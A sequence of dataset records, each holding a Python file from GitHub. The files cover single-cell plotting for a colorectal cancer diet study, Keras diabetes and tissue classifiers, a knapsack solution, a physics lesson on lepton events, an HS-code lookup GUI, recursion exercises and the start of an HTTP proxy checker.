sc.pl.dotplot(adata, markers, groupby=group_by, dendrogram=False, standard_scale='var', show=False, save=f\"epicells_{condition}.pdf\")\n \n # sc.pl.dotplot(adata, markers, groupby=group_by, standard_scale='var', dendrogram=True, show=False, save=f\"epicells_{condition}_ss_var.pdf\")\n # sc.pl.dotplot(adata, markers, groupby=group_by, standard_scale='group', dendrogram=True, show=False, save=f\"epicells_{condition}_ss_group.pdf\")\n\n\n\"\"\"plot_dotplot_tumor_markers_vs_individual_condition(\"CD-AOM-DSS-Epi_plus_DN\", \"cluster\")\nplot_dotplot_tumor_markers_vs_individual_condition(\"Control-no-AOM-DSS-Immune\", \"cluster\")\nplot_dotplot_tumor_markers_vs_individual_condition(\"HFD-AOM-DSS-Epi_plus_DN\", \"cluster\")\nplot_dotplot_tumor_markers_vs_individual_condition(\"LFD-AOM-DSS-Epi_plus_DN\", \"cluster\")\"\"\"\n\n\ndef plot_dotplot_cancer_vs_control(group_by):\n adata_integ_clust = sc.read_h5ad(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_integrated_clustered.h5ad\")\n adata = utils.get_filtered_concat_data(\"sc_epicells_aom_noaom\")\n adata = adata[adata_integ_clust.obs_names,:]\n adata.obs[\"leiden_0.20\"] = adata_integ_clust.obs[\"leiden_0.20\"]\n adata.obs[\"crc\"] = \"no-AOM-DSS\"\n adata.obs.loc[adata[adata.obs[\"condition\"].isin([\"CD-AOM-DSS-Epi_plus_DN\", \"HFD-AOM-DSS-Epi_plus_DN\", \"LFD-AOM-DSS-Epi_plus_DN\"]),:].obs_names, 'crc'] = \"AOM-DSS\"\n \n \"\"\"for cond in [\"CD-AOM-DSS-Epi_plus_DN\", \"Control-no-AOM-DSS-Immune\", \"HFD-AOM-DSS-Epi_plus_DN\", \"LFD-AOM-DSS-Epi_plus_DN\"]:\n \n if \"Immune\" in cond:\n adata[adata.obs[\"condition\"]==cond,: ].obs[\"crc\"] = \"no-AOM-DSS\"\n else:\n adata[adata.obs[\"condition\"]==cond,: ].obs[\"crc\"] = \"AOM-DSS\"\n # adata.obs[\"condition\"][\"Control-no-AOM-DSS-Immune\"] = \"No-AOM-DSS\"\n # adata.obs[\"condition\"][\"HFD-AOM-DSS-Epi_plus_DN\"] = \"AOM-DSS\"\n # adata.obs[\"condition\"][\"LFD-AOM-DSS-Epi_plus_DN\"] = \"AOM-DSS\"\n \"\"\"\n\n print(adata.obs[\"crc\"])\n print(adata)\n\n sc.pp.normalize_total(adata, target_sum=1e6)\n sc.pp.log1p(adata)\n adata_integ_clust.var.index = pd.Index(gen.upper() for gen in adata_integ_clust.var.index.values)\n adata.var.index = pd.Index(gen.upper() for gen in adata.var.index.values)\n # markers = [\"EPCAM\", \"CDH1\", \"MUC3\", \"CDHR5\", \"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"AXIN2\", \"NOTUM\", \"SOX4\", \"PROX1\", \"MUC2\", \"REG4\", \"CCL9\", \"MMP7\", \"IFITM3\"]\n # markers = [\"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"PROX1\", \"MMP7\"] \n markers = [ \"EPCAM\", \"CDH1\", \"CDHR5\", \"MUC3\", \"MUC2\", \"REG4\", \"AXIN2\", \"SOX4\", \"IFITM3\", \"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"PROX1\", \"MMP7\"]\n # markers = [\"EPCAM\", \"MUC3\", \"CDHR5\", \"WNT6\", \"WNT10A\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"SOX4\", \"PROX1\", \"MUC2\", \"REG4\", \"CCL9\", \"MMP7\", \"IFITM3\"]\n\n sc.pl.dotplot(adata, markers, groupby=group_by, dendrogram=False, show=False, save=f\"epicells_aom-dss_no-aom-dss.pdf\")\n\n markers = [\"WNT6\", \"WNT10A\", \"FZD10\", \"DKK3\", \"WIF1\", \"NKD1\", \"NOTUM\", \"PROX1\", \"MMP7\"] \n sc.pl.dotplot(adata, markers, groupby=group_by, dendrogram=False, show=False, save=f\"epicells_aom-dss_no-aom-dss_excluding_HEGs.pdf\") \n \n top10_16_clust = [\"NKD1\", \"ASPSCR1\", \"IFITM3\", \"NOTUM\", \"PROX1\", \"CYBA\", \"WIF1\", \"FAM89A\", \"MT3\", \"IFITM1\"]\n sc.pl.dotplot(adata, top10_16_clust, groupby=group_by, dendrogram=False, show=False, save=f\"epicells_aom-dss_no-aom-dss_clust_16_top10_DEGs.pdf\") \n # sc.pl.dotplot(adata, markers, groupby=group_by, standard_scale='var', dendrogram=True, show=False, save=f\"epicells_{condition}_ss_var.pdf\")\n # sc.pl.dotplot(adata, markers, groupby=group_by, standard_scale='group', dendrogram=True, show=False, save=f\"epicells_{condition}_ss_group.pdf\")\n\n# plot_dotplot_cancer_vs_control(\"crc\")\n\n\ndef plot_barplot_cell_proportion_in_cluster(adata_path, sample_type, obs_cluster):\n # colocalization analysis performed based on https://www.nature.com/articles/s41467-021-21892-z#Sec8\n adata = sc.read_h5ad(adata_path)\n\n meta = utils.get_meta_data(sample_type)\n condition = list(np.unique(meta['condition']))\n condition = [\"Control-no-AOM-DSS-Immune\", \"CD-AOM-DSS-Epi_plus_DN\", \"LFD-AOM-DSS-Epi_plus_DN\", \"HFD-AOM-DSS-Epi_plus_DN\"]\n prop_lst = []\n\n\n for clust in adata.obs[obs_cluster].cat.categories:\n adata_tmp = adata[adata.obs[obs_cluster]==clust,:]\n n_of_cells = adata_tmp.shape[0]\n # prop_dict[clust] = []\n \n for cond in condition:\n adata_tmp2 = adata_tmp[adata_tmp.obs[\"condition\"]==cond,:]\n proportion = adata_tmp2.shape[0]/n_of_cells\n\n print(clust, cond, n_of_cells, adata_tmp2.shape) \n cond_lbl = cond.split(\"_\")[0]\n if \"Control\" in cond:\n cond_lbl = \"no-AOM-DSS\"\n \n prop_lst.append([cond_lbl, clust, proportion])\n \n\n\n\n\n df = pd.DataFrame(prop_lst, columns=['Group', \"Cluster\", \"Proportion\"])\n sns.set(font_scale = 0.5)\n sns.barplot(data=df, x='Cluster', y='Proportion', hue='Group').set(title='Proportions of Cells in Clusters')\n \n plt.rcParams['figure.dpi']= 300\n plt.rcParams['figure.figsize']= (240, 120)\n # plt.xticks(rotation=45)\n # fig.tick_params(labelsize=5)\n plt.tight_layout()\n plt.savefig(f\"../plots/../plots/sc_epicells_aom_noaom_cluster/barplot_proportion_cluster.pdf\") \n plt.clf()\n\n# plot_barplot_cell_proportion_in_cluster(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_integrated_clustered.h5ad\", \"sc_epicells_aom_noaom\", \"leiden_0.20\")\n# plot_barplot_cell_proportion_in_cluster(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_aom_noaom_integrated_clustered.h5ad\", \"sc_epicells_aom_noaom\", \"leiden_0.20\")\nplot_barplot_cell_proportion_in_cluster(\"/Users/ahmet/Google Drive/Projects/saezlab/CRCDiet/data/out_data/sc_epicells_aom_noaom_concatenated_celltype_annot.h5ad\", \"sc_epicells_aom_noaom\", \"cluster\")\n\ndef plot_barplot_markers_vs_groups(adata, markers, group_by):\n\n expression_cutoff = 0.0\n markers = ['CD3D', 'CD79A','CST3']\n dp = sc.pl.DotPlot(adata, markers, groupby=group_by)\n obs_bool = dp.obs_tidy > expression_cutoff\n dot_color_df = (dp.obs_tidy.mask(~obs_bool).groupby(level=0).mean().fillna(0))","repo_name":"saezlab/CRCDiet","sub_path":"bin/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":32887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34042064262","text":"# TensorFlow and tf.keras\n# imports everything needed\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nimport numpy\n# sets random seed to 7 for reproducing the same results every time\nnumpy.random.seed(7)\n\n# loads the dataset for the pima indians, found in ./data\ndataset = numpy.loadtxt(\"./data/pima-indians-diabetes.csv\", delimiter=\",\")\n\n# slices data:\n# the first : means all rows, the 0:8 means columns 0-8, which means 8th column gets ignored\nX = dataset[:,0:8]\n# the first : means all rows, the 8 means ONLY the 8th column, in other words, the output. \nY = dataset[:,8]\n\n# creates model layer by layer\n# model type, Sequential\nmodel = Sequential()\n# adds the first layer (Dense means that the layers are fully connected, every node connects to every node)\n# The 12 means 12 neurons, input dim means 8 inputs (one for each part of the data) and activation is recitifier, meaning \n# that the layer will generalized based on a straight line? \nmodel.add(Dense(12, input_dim=8, activation='relu'))\n# this adds a second Dense layer, with 8 neurons, and the same recitifier activation\nmodel.add(Dense(8, activation='relu'))\n# this is the final layer, so only 1 neuron, because there is a binary answer if someone has diabetes\n# the activation for this layer is sigmoid, this is a function that only outputs an answer between 0 and 1, making it a good \n# activation function for specifically predictions, considering something can't have a 110% chance of happening. \nmodel.add(Dense(1, activation='sigmoid'))\n\n# This sets up the model to be run efficiently on a computer depending on hardware, so this is the part that optimizes \n# using Tensorflow. \n# It's important to define the kind of loss used for optimal predictions, in this case,\n# the loss in this model is lograithmic, defined as crossentropy\n# Adam will be used as the gradient descent algorithm primarily because it's efficient \n# Finally, because this problem is classification, accuracy is the best metric to measure. \nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n# This fits the data to the model in order for the model to be trained, \n# epochs is the amount of iterations through the dataset while \n# batch size is the number of datapoints looked at before the weights are changed\n# finally, verbose is just the progress bar. \nmodel.fit(X,Y, epochs=15, batch_size=10, verbose=2)\n\n\n# scores is equal to the evaluation of the models predictions (Y) from the data (X)\nscores = model.evaluate(X,Y)\n# this prints what's shown in the console, in other words, the accuracy\nprint(\"\\n%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n\n\n\n# # predictions is the model's predictions\n# predictions = model.predict(X)\n\n# # rounded is equal to the rounded version of predictions since it used the sigmoid function, \n# # rounded is always either 0 or 1\n# rounded = [round(x[0]) for x in predictions]\n# # this prints the predictions\n# print(rounded)","repo_name":"alejandro123210/Deep-learning-Projects","sub_path":"diabetesPrediction/diabetesPrediction.py","file_name":"diabetesPrediction.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8797148669","text":"N,W =map(int,input().split())\ninf = 10**10\ndp = [[inf]*(100001) for _ in range(N+1)]\nfor i in range(N+1):\n dp[i][0] = 0\nfor i in range(N):\n w,v = map(int,input().split())\n for j in range(100001):\n if j - v >= 0:\n if w + dp[i][j-v] <= W:\n dp[i+1][j] = min(dp[i][j],w + dp[i][j-v])\n else:\n dp[i+1][j] = dp[i][j]\n else:\n dp[i+1][j] = dp[i][j]\n# print(dp[-2][:18])\nfor j in range(len(dp[-1])-1,-1,-1):\n if dp[-1][j] < inf:\n print(j)\n exit()\n","repo_name":"shimamura10/Atcoder","sub_path":"edpc/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35223786743","text":"import numpy \nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nfrom matplotlib import pyplot \n\n# ========================== Loop Review =============================\n\n# great for when you need to do one thing a lot of times \n\n# ====== While Loop \n# while :\n # do this\n\nx = 0\nwhile x < 10:\n print(x) \n x = x + 1\n\n# ====== For loop\n\n# for each_entry in list_like:\n # do stuff. \n\nproton = ['up', 'up', 'down', 'gluon']\nfor item in proton:\n print(item)\n\n# how many vowels are in the proton?\nvowels = ['a', 'e', 'i', 'o', 'u']\nvowels_counted = 0\nfor item in proton:\n for letter in item:\n if letter in vowels:\n vowels_counted += 1\n\n# loop over list incl [0,1,...,9]. Print square of entry\nfor item in range(10):\n print(item**2)\n\n# ========================== SOLUTIONS ================================\n\nEvents = numpy.loadtxt(\"Events.dat\")\n\n# Ex 1 - 2 minutes \n\ntemp = Events[9][5]\nprint(temp)\n\n\n# Ex 2 - 2 minutes \ntemp = Events[1000][12]\nprint(temp)\n\n# Ex 3 - 15 minutes \n# hist energy of highest pt Lep\n\n# get list of energies\n# so first we make two numpy arrays which we'll use to store the energies \nnumber = len(Events)\nenergies_first = numpy.zeros(number)\nenergies_second = numpy.zeros(number)\n\niterate = 0\nwhile iterate < number:\n # then we loop over all the events and assign energies to our new arrays\n energies_first[iterate] = Events[iterate][5]\n energies_second[iterate] = Events[iterate][11]\n\n iterate += 1\n\n# make histograms \nbins = numpy.linspace(0,1000,101) #note! We use 101, since this is the number of edges and not bins! \n\npyplot.hist(energies_first, bins)\npyplot.hist(energies_second, bins)\npyplot.xlabel(\"Energy [GeV]\")\npyplot.ylabel(\"Count\")\npyplot.show()\n\n# Ex 4 - 15 minutes \n\n# Some counters we can use. Basically just integers. \nplus_plus = 0\nminus_minus = 0\nplus_minus = 0\nminus_plus = 0\n\nsame_sign = []\nopp_sign = []\n\niterate = 0\n# we loop over all the events, and count them up! \nwhile iterate < number:\n event = Events[iterate]\n \n if event[6]>0:\n if event[12]>0:\n plus_plus += 1\n same_sign.append(event)\n else:\n plus_minus += 1 \n opp_sign.append(event)\n else:\n if event[12]>0:\n minus_plus += 1\n opp_sign.append(event)\n else:\n minus_minus += 1\n same_sign.append(event)\n\n iterate += 1\n\nnumpy.savetxt(\"same_sign.txt\", same_sign)\nnumpy.savetxt(\"opp_sign.txt\",opp_sign)\nprint(\"Both plus: {}\".format(plus_plus))\nprint(\"Minus Plus: {}\".format(minus_plus))\nprint(\"Plus Minus: {}\".format(plus_minus))\nprint(\"Minus Minus: {}\".format(minus_minus))\n\n# Ex 5 - 15 minutes\n# this one's a lot trickier! \n# we prepare some empty lists \ntwo_mu = []\ntwo_el = []\nmu_el = []\n\niterate = 0\nwhile iterate < number:\n # loop over the events\n # check what kind of event it is, then append the whole event to the relevant list \n event = Events[iterate]\n if abs(event[7])==11 and abs(event[13])==11: # two electrons\n two_el.append(event)\n \n if abs(event[7])==13 and abs(event[13])==13: # two muons \n two_mu.append(event)\n \n if (abs(event[7])==11 and abs(event[13])==13) or (abs(event[7])==13 and abs(event[13])==11):\n # electron and muon OR muon and electron\n mu_el.append(event)\n\n iterate += 1\n\nprint(\"Two Mu: {}\".format(len(two_mu)))\nprint(\"Two El: {}\".format(len(two_el)))\nprint(\"Combo: {}\".format(len(mu_el)))\n\n# Ex 6 - 3 minutes\n# save the files\nnumpy.savetxt(\"two_mu.txt\",two_mu)\nnumpy.savetxt(\"two_el.txt\",two_el)\nnumpy.savetxt(\"mu_el.txt\",mu_el)\n\n### =========================== Alternate Solutions =====================================\nprint(\"Starting Alternates!\")\n\n# these are some other, weirder ways, we can solve the exercises\n\n# Ex 3\n\n# look up python list comprehension! It's fun \nenergies = numpy.transpose([[evt[5], evt[11]] for evt in Events])\n\npyplot.hist(energies[0], numpy.linspace(0,1000,100))\npyplot.hist(energies[1], numpy.linspace(0,1000,100))\npyplot.xlabel(\"Energy [GeV]\")\npyplot.ylabel(\"Count\")\npyplot.show()\n\n# Ex 4\n\n# Ex 5\ntwo_mu = [event for event in Events if (abs(event[7])==13 and abs(event[13])==13) ]\ntwo_el = [event for event in Events if (abs(event[7])==11 and abs(event[13])==11) ]\nmu_el = [event for event in Events if ((abs(event[7])==11 and abs(event[13])==13) or (abs(event[7])==13 and abs(event[13])==11))]\n\nprint(\"Two Mu: {}\".format(len(two_mu)))\nprint(\"Two El: {}\".format(len(two_el)))\nprint(\"Combo: {}\".format(len(mu_el)))\n","repo_name":"BenSmithers/Analysis","sub_path":"summer_camp/lesson4.py","file_name":"lesson4.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44586049184","text":"import re\nimport pandas as pd\nimport sqlite3\nfrom tkinter import *\nfrom tkinter import messagebox\nimport os, sys\n\n#should get thevalues in the list already created and print them before the results \n#is having more values good? because i cannot have det them by index in a list ??\n\n#creating the interface\nroot=Tk()\ninput_box=Text(padx=15)\noutput_box=Text(padx=15)\n\n\nroot.geometry(\"400x400\")\n#initialize the list here\n\n#choosing tje right db\n#we can use a list of lists to process this and creeate lists dinamically \n\ndef creating_all_the_dbs_lists():\n global zip_dict\n global dbs\n choice = [ \"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\", \"eight\", \"nine\"]\n dbs = [[] for i in range(10)]\n count = -1\n for i in choice:\n # we index the values in the lists of lists to get what we need\n with sqlite3.connect(\"C:\\\\Users\\\\cavazzinil\\\\OneDrive - YOOX NET-A-PORTER GROUP\\\\Desktop\\\\ff\\\\hs_codes\\\\hs_codes.db\") as conn:\n command = (\"SELECT codes, description FROM \" + i ) #LIKE 'i%'\n result = conn.execute(command)\n list_of_results = result.fetchall()\n zip_dict = (dict(list_of_results))\n count = count + 1\n dbs[count].append(zip_dict)\n \n\ncreating_all_the_dbs_lists()\n\n\ndef checking_for_input():\n global results\n global codes \n codes = []\n results = []\n #getting the inputs \n #output_box.delete(0, END)\n print(\"entering the function\")\n h=input_box.get(\"1.0\", \"end\").strip().split()\n no_dupl = list(dict.fromkeys(h))\n for i in no_dupl:\n checking_list_inputs(i)\n for i in range(len(results)):\n output_box.insert(\"end\", codes[i] + \" \" + results[i] + '\\n')\n\n\n\ndef clean_the_input(input_word):\n separators = [\"-\",\",\", \"/\", \".\", \"*\", \" \", \" \", \" m\", \"m\" ,\"a\", \"t\", \"c\", \"h\", \"'\", \"]\", \">\", \"=\", \")\"]\n #turning it to string\n new_word = \"\".join([i for i in input_word if i not in separators])\n return new_word\n\ndef calculating_x(base, n):\n global x\n #need to work on the algorithm here to reload onece it has been checked \n x = re.search(fr\"{base}\", n)\n if x!=None:\n return base, n\n\n\ndef checking_list_inputs(word):\n global chosen_list_in_dict\n try:\n cleaned_word = clean_the_input(word)\n if str.isdigit(cleaned_word[:1]):\n start_inp = int(cleaned_word[:1])\n chosen_list = dbs[start_inp]\n chosen_list_in_dict = {}\n #could have here a mechanisn that checks if the word contains only numbers\n #if not i put it into the output window\n for i in chosen_list:\n chosen_list_in_dict.update(i)\n #needs to be a while loop that strips the values as we go until something is found\n first_iteration = [calculating_x(cleaned_word, i) for i in chosen_list_in_dict]\n result_first_iteration = [i for i in first_iteration if i!=None]\n if len(result_first_iteration)==0:\n second_iteration = [calculating_x(cleaned_word[:-2], i) for i in chosen_list_in_dict]\n result_first_iteration = [i for i in second_iteration if i!=None]\n #(str(result_second_iteration).split(\",\"))[2]\n #need to index here !!!!! in case it is not found at the first iteration \n tupling = tuple(str(result_first_iteration).split(\",\"))\n output_of_cleaning_tuple = (clean_the_input(tupling[1]))\n \n \n results.append(chosen_list_in_dict[output_of_cleaning_tuple])\n codes.append(output_of_cleaning_tuple)\n\n\n\n \n #results.append(\" WARNING, NOT FOUND AS A VALID HS CODE\")\n #codes.append(cleaned_word)\n #print here as both loops have been checked, need to change n here\n #\n \n else:\n results.append(\" WARNING, NOT A VALID NUMERIC HS CODE\")\n codes.append(cleaned_word)\n\n except Exception as e :\n messagebox.showinfo(message='An error has occurred ')\n print(e)\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n print(exc_type, fname, exc_tb.tb_lineno)\n\n#tryng to call the function here to see if it works\nbutton_check=Button(text=\"see variable\", command=checking_for_input,padx=15 )\ninput_box.grid(row=0, column=0)\noutput_box.grid(row=0, column=1)\nbutton_check.grid(row=1, column=1)\n\n\nroot.mainloop()\n","repo_name":"defPyMe/numeric_to_description_hs_codes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43282945938","text":"import math\ndef f(x1, y1, x2, y2):\n return math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n \nn = int(input())\na = [list(map(int,input().split())) for i in range(n)]\n\nmax = 0\n\nfor i in a:\n for j in a:\n if max < f(*i, *j):\n max = f(*i, *j)\nprint(max)","repo_name":"kanadomekei/at.coder","sub_path":"at.coder_beginner_contest/b234.py","file_name":"b234.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23263476469","text":"#!/usr/bin/env python3\n\n\"\"\"Command line shareclip client.\n\nWill allow posting from args, post from clipboard, copy to clipboard,\ndelete, undo delete, shutdown, etc.\"\"\"\n\nimport asyncio\n\nimport aiohttp\nimport async_timeout\n\n\nasync def fetch(session, url):\n\t\"\"\"Pull a single URL.\"\"\"\n\twith async_timeout.timeout(10):\n\t\tasync with session.get(url) as response:\n\t\t\treturn await response.text()\n\n\nasync def main():\n\t\"\"\"Command line entry point.\"\"\"\n\tasync with aiohttp.ClientSession() as session:\n\t\thtml = await fetch(session, 'http://localhost:8080')\n\t\tprint(html)\n\n\tloop = asyncio.get_event_loop()\n\tloop.run_until_complete(main())\n","repo_name":"mjem/shareclip","sub_path":"shareclip/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71046134569","text":"#!/usr/bin/env python3\n\nwith open('/home/kami/Projetos/Cod3r/Manipulação_Arquivo/pessoas.csv') as arquivo:\n #o with(com) ele vai chamar o arquivo, e o \"as\" é como definir uma varivael, vc deifinou ele como arquivo\n #ele é garantido que o recurso do bloco será fechado, não precisa pedir para fechar\n for registro in arquivo:\n print('Nome: {}, Idade: {}'.format(*registro.strip().split(',')))\n \nif arquivo.closed:\n print('Arquivo ja foi fechado')\n ","repo_name":"kamibarreto/Cod3r","sub_path":"Manipulação_Arquivo/io_5.py","file_name":"io_5.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10499859495","text":"#recursion\r\n#function calling itself\r\n#recursive\r\n#curve writting\r\n#function of statements recursion\r\n#block:\r\n#if while for write is block of ststement\r\n#funtion call again and again\r\n#when function true only that time its runngaian again\r\n#conditions:\r\n#function must use\r\n#not use looping condition\r\n#if staement use for stop recursion \r\n\r\n'''example 1:\r\ndef getusernamepassword(username, password):\r\n if username != 'abc':\r\n print(\"incorrect username\")\r\n username=input(\"enter the username\")\r\n password=input(\"enter the password\")\r\n getusernamepassword(username, password)\r\n elif password != 'abc':\r\n print(\"incorrect password\")\r\n username=input(\"enter the username\")\r\n password=input(\"enter the password\")\r\n getusernamepassword(username, password)\r\n\r\nusername=input(\"enter the username\")\r\npassword=input(\"enter the password\")\r\ngetusernamepassword(username, password)\r\n\r\n#example 2:\r\ndef additions(b):\r\n print(b)\r\n b+=1\r\n if b<=10:\r\n additions(b)\r\n\r\nadditions(1)\r\n\r\n#addtion of digits\r\n#factorial\r\n#GcD\r\n#LcM\r\n#fibbonacci\r\n\r\n#example3:\r\n\r\nfact=1\r\nfor i in range(1,6):\r\n fact=fact*i\r\n print(fact)\r\n\r\ndef fact(num):\r\n if num==1:\r\n return 1\r\n else:\r\n return num * fact(num-1)\r\nresult=fact(7)\r\nprint(result)'''\r\n\r\n#example3:\r\n#sum of digits\r\n\r\ndef sumofdiguts(number):\r\n if number==0:\r\n return 0\r\n else:\r\n rem=number%10\r\n no=number/10\r\n total=rem +sumofdiguts(no)\r\n return total\r\nresult=sumofdiguts(1543) \r\nprint(result)\r\n\r\nprint(__name__)\r\n\r\n#need to use recussion\r\n\r\n#palindrome\r\n#armstrong\r\n#reverse a string\r\n#reverse a sentence\r\n","repo_name":"kasiprabu/PythonCore","sub_path":"recurion.py","file_name":"recurion.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26668115252","text":"from os.path import isfile\nfrom scipy.io import loadmat, savemat\nfrom sklearn.preprocessing import Normalizer\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, BatchNormalization, Dropout\nfrom keras.optimizers import Adam\n\n\ndef load_data():\n if not isfile('features_training.mat') or not isfile('labels_training.mat'):\n raise Exception('\"features_training.mat\" and \"labels_training.mat\" not found in the current path.')\n print('Loading features_training.mat...')\n features = loadmat('features_training.mat')['features']\n features = Normalizer().fit_transform(features) # row normalization: ||x(i)|| = 1\n print('Loading labels_training.mat...')\n labels = loadmat('labels_training.mat')['labels'] > 0 # {-1,1} -> {0,1}\n return features, labels\n\n\ndef build_model():\n model = Sequential()\n # model.add(BatchNormalization(name='bn0')) # column normalization\n # hidden layer 1\n model.add(Dense(1000, input_dim=2000, kernel_initializer='he_normal', name='l1'))\n model.add(BatchNormalization(name='bn1'))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n # hidden layer 2\n model.add(Dense(1000, kernel_initializer='he_normal', name='l2'))\n model.add(BatchNormalization(name='bn2'))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n # hidden layer 3\n model.add(Dense(500, kernel_initializer='he_normal', name='l3'))\n model.add(BatchNormalization(name='bn3'))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n # output layer\n model.add(Dense(1, kernel_initializer='glorot_normal', name='l4'))\n model.add(Activation('sigmoid'))\n\n model.compile(optimizer=Adam(lr=0.001, decay=0.01, amsgrad=True),\n loss='binary_crossentropy',\n metrics=['accuracy'])\n return model\n\n\ndef save_params():\n p = {'epsilon': 0.001} # batch normalization epsilon\n for i in range(1, 4): # batch normalization parameters\n p[f'gamma{i}'], p[f'beta{i}'], p[f'mean{i}'], p[f'std{i}'] = model.get_layer(f'bn{i}').get_weights()\n for i in range(1, 5): # weights and biases\n p[f'W{i}'], p[f'b{i}'] = model.get_layer(f'l{i}').get_weights()\n savemat('model.mat', p)\n\n\nif __name__ == '__main__':\n model = build_model()\n X, Y = load_data()\n model.fit(X, Y, validation_split=0.1, epochs=10, batch_size=256)\n save_params()\n","repo_name":"SichaoYang/W2MHS","sub_path":"training/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"18773277290","text":"#!/usr/bin/env python\n\n\"\"\"\n\n\"\"\"\n\n__author__ = \"MU Mengyuan\"\n\nimport os\nimport sys\nimport glob\nimport pandas as pd\nimport numpy as np\nimport netCDF4 as nc\nimport datetime\nfrom scipy.interpolate import interp1d\nfrom scipy.interpolate import griddata\n\ndef main(fname_lis,fname_hess,loc_lat_lis,loc_lon_lis):\n\n lis = nc.Dataset(fname_lis, \"r\")\n hess = nc.Dataset(fname_hess, \"r\")\n\n\n para = pd.DataFrame([lis.variables['Soiltype_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['isoil'][0,0]],\n columns=['Soiltype'])\n\n para['sand'] = [lis.variables['SandFrac_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['sand'][0,0]]\n para['silt'] = [lis.variables['SiltFrac_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['silt'][0,0]]\n para['clay'] = [lis.variables['ClayFrac_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['clay'][0,0]]\n para['ssat'] = [lis.variables['Porosity_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['ssat'][0,0]]\n para['bch'] = [lis.variables['bch_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['bch'][0,0]]\n para['sfc'] = [lis.variables['sfc_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['sfc'][0,0]]\n para['swilt']= [lis.variables['swilt_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['swilt'][0,0]]\n para['hyds'] = [lis.variables['hyds_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['bch'][0,0]]\n para['sucs'] = [lis.variables['sucs_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['sucs'][0,0]]\n para['css'] = [lis.variables['css_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['css'][0,0]]\n para['rhosoil'] = [lis.variables['rhosoil_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['rhosoil'][0,0]]\n para['elev'] = [lis.variables['Elevation_inst'][0,loc_lat_lis,loc_lon_lis],\n hess.variables['elev'][0,0]]\n\n hess.close()\n lis.close()\n\n para.to_csv(\"./csv/soil_parameters.csv\")\n\n\nif __name__ == \"__main__\":\n\n\n # lat_-355_lon_1495\n loc_lat = 54 # -35.5\n loc_lon = 149 # 149\n loc_lat_lis = 40\n loc_lon_lis = 140\n\n fname_hess = \"/g/data/w35/mm3972/model/cable/runs/my_version/run_Princeton_single_pixel/ctl/outputs/lat_-355_lon_1495_grass/cable_out_2008.nc\"\n fname_lis = \"/g/data/w35/mm3972/model/wrf/NUWRF/LISWRF_configs/Princeton_ctl_para/LIS_output/LIS.CABLE.2008020100.d01.nc\"\n\n main(fname_lis,fname_hess,loc_lat_lis,loc_lon_lis)\n","repo_name":"bibivking/pixel_met","sub_path":"compare_soil_parameters.py","file_name":"compare_soil_parameters.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69867384490","text":"import requests\r\nimport threading\r\nfrom server.proxy import *\r\n\r\nTEST_URLS = [\r\n \"http://ifconfig.me/\"\r\n]\r\n\r\n\r\nclass ValidateHTTPProxies:\r\n def __init__(self, file, out_name='', 